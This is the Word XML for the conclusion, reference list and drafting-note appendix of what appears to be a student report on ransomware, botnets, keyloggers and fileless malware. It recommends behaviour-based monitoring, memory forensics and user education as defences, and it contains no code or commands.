          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">ation of malware. Its financial impact is unmatched, especially in sectors like healthcare, education, and finance. The affiliate model has made high-end ransomware accessible to lower-skilled attackers, making this threat harder to contain at </w:t>
      </w:r>
      <w:r w:rsidR="00B048E8" w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>scale.</w:t>
      </w:r>
      <w:r w:rsidR="00B048E8" w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Botnets</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> are often used in campaigns that require sustained access, remote surveillance, or coordinated disruption. Their ability to remain dormant and spread silently across a network makes them useful for long-term operations. Even a small-scale simulation showed how easily bots could be deployed and controlled over a private command </w:t>
      </w:r>
      <w:r w:rsidR="001D2BFD" w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>channel. Finally</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>keylogger-based malware</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> demonstrated how low-complexity tools can still offer high surveillance value. When combined with remote communication and startup persistence, keyloggers can remain hidden for long periods and quietly gather sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C6BA02" w14:textId="195D20DA" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Each of these techniques presents unique challenges for defenders. Traditional antivirus solutions, once considered sufficient, now fail to address memory-resident threats or user deception. More importantly, the tools used in both implementations—PowerShell, Python, Flask—are freely available and require only moderate skill to use effectively. This lowers the barrier for attackers and increases the urgency for improved defense </w:t>
      </w:r>
      <w:r w:rsidR="00B048E8" w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>strategies. Ultimately</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, the findings highlight the need for cybersecurity solutions to evolve. Defenders must adopt </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>behavior-based monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>memory forensics</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user education</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> that goes beyond basic awareness. Threats are no longer just technical—they are psychological, automated, and modular. Understanding them from an attacker’s point of view offers the best chance of staying one step ahead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47594B9A" w14:textId="6CC89875" w:rsidR="00612562" w:rsidRPr="008217DA" w:rsidRDefault="00612562" w:rsidP="008217DA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc194070990"/>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B63CF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Adebayo, J., &amp; Obembe, O. (2023). Understanding the mechanics of credential harvesting in phishing attacks. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>International Journal of Cybercrime Studies, 15</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(1), 44–60.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354DD0C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Ahmed, S., Kapoor, R., &amp; Beltran, D. (2023). Understanding RaaS operations: From development to deployment. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Journal of Cyber Threat Intelligence, 18</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(2), 121–139.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054E7414"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Ali, M., Khan, A., &amp; Latif, M. (2022). In-memory malware execution: Fileless attack strategies. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Journal of Cybersecurity Research, 12</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(1), 45–61.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC7CF53"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Bashir, M., &amp; Papadopoulos, P. (2023). HTTPS abuse in phishing: Trust indicators and user deception. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ACM Transactions on Privacy and Security, 26</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(3), 91.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6569757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Bhardwaj, A., &amp; Goundar, S. (2020). Keyloggers: Silent cyber security weapons. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Network Security, 2020</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(2), 9–15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CD7AE1"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Huang, B., &amp; Felder, J. (2023). Securing DevOps: Software bill of materials in supply chain security. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ACM Transactions on Software Engineering, 42</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(3), 65.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEFD93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Iduh, B. N., Umeh, M. N., &amp; Paul, R. U. (2024). Ethical keylogger solution for monitoring user activities. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>World Journal of Advanced Engineering Technology and Sciences, 7</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(5), 223–237.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6DC84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Javed, A., &amp; Silva, T. (2023). Simulating botnet attacks for cybersecurity education. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>International Journal of Cybersecurity Pedagogy, 8</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(1), 21–34.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A96B2B"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Lee, T., &amp; Mohammed, K. (2022). Ransomware-as-a-Service: Dissecting the underground economy. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IEEE Security &amp; Privacy, 20</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(4), 52–60.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6281118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Marczak, B., &amp; Paxson, V. (2023). Understanding botnet infrastructure and control techniques. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IEEE Security &amp; Privacy, 21</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(2), 45–52.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C898D9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Mourya, R., Patil, K., &amp; Srivaramangai, R. (2024). Real-time keystroke monitoring with encryption. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>International Journal of Science and Research, 13</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(4), 1342–1347.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140A43E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Orebaugh, A., &amp; Allnutt, S. (2022). Anatomy of a phishing kit: Techniques and trends. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Journal of Cybersecurity Insights, 18</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(2), 102–117.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DCEC6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Ryu, D., Park, Y., &amp; Choi, J. (2023). Memory forensics for detecting fileless malware. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Digital Investigation, 44</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, 101216.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E654D2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Singh, V., Khan, F., &amp; Rao, R. (2022). A review of botnet detection and disruption strategies. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Journal of Information Security and Applications, 64</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, 103042.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4DE46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Sun, L., Zhang, J., &amp; Kim, S. (2023). Unveiling fileless attacks: Analysis of memory-resident threats. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IEEE Transactions on Dependable and Secure Computing, 20</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(2), 198–213.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615662F4" w14:textId="346125D8" w:rsidR="001B4894" w:rsidRDefault="00612562" w:rsidP="001B4894">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tan, W., Clarke, N., &amp; Zhou, H. (2023). Tracing RaaS through dark web intelligence. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Computers &amp; Security, 123</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, 102987.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2472CD1D" w14:textId="77777777" w:rsidR="00FC70F4" w:rsidRDefault="00FC70F4" w:rsidP="00FC70F4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF4E28C" w14:textId="77777777" w:rsidR="00FC70F4" w:rsidRPr="00FC70F4" w:rsidRDefault="00FC70F4" w:rsidP="00FC70F4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64EB8106" w14:textId="03DF13B9" w:rsidR="001B4894" w:rsidRDefault="00C73A46" w:rsidP="00C73A46">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73A46">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">8.Appendix </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2224DFD8" w14:textId="77777777" w:rsidR="00C73A46" w:rsidRPr="00C73A46" w:rsidRDefault="00C73A46" w:rsidP="00C73A46"/>
    <w:p w14:paraId="2410BA38" w14:textId="6CB75E2A" w:rsidR="00C4166A" w:rsidRDefault="00C4166A" w:rsidP="001B4894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Download all the 16 paper individually and extract more concrete data, comparative analysis and synthesis and deduction from each of the 3 papers for every malware type </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04184A70" w14:textId="6743C52C" w:rsidR="00C4166A" w:rsidRDefault="00C4166A" w:rsidP="001B4894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the refined version for the evaluation and recommendation section </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70471C79" w14:textId="2C0094DC" w:rsidR="001B4894" w:rsidRPr="008217DA" w:rsidRDefault="00C4166A" w:rsidP="001B4894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> finish up with the implementations.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001B4894" w:rsidRPr="008217DA" w:rsidSect="0055378B">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1270" w:right="1270" w:bottom="1270" w:left="12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9717C" w14:textId="77777777" w:rsidR="004C5859" w:rsidRDefault="004C5859" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5F808540" w14:textId="77777777" w:rsidR="004C5859" w:rsidRDefault="004C5859" w:rsidP="0026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027A6" w14:textId="77777777" w:rsidR="004C5859" w:rsidRDefault="004C5859" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3A297E7B" w14:textId="77777777" w:rsidR="004C5859" w:rsidRDefault="004C5859" w:rsidP="0026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65D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3DB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2F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD8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4E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8F0F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AF0685"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8AD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3D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F69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3716"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EBC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D0A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="230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50E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90768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032438"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3DD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E6812"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD2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44E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="14C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2D03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25F2F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C4EB3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FF24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184921"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60C04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54397E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A2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6088B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8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0F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD3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B7AFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FB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60C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3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F644B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DBB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C3998"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="653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C7A24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E0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C6BD1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="044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72DCF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0E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057EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10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D33A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A8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92528"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D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A24C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6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D521B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="863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20A78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD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C6F67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="025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C30ED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80E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A18B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3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B7D66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE8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430ED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="880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C4DF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="41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B2E66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87B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03A33"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C72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72744"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="31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41816"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="81F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C7FF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="84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B5F15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E9D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160F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E5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A9379B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE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B19B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C9C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126BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB0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7BB6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74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5AFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87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C30452"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D91CA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6D065A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5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84AD7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADF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01291"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D37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62046"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="849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33EF5"/>
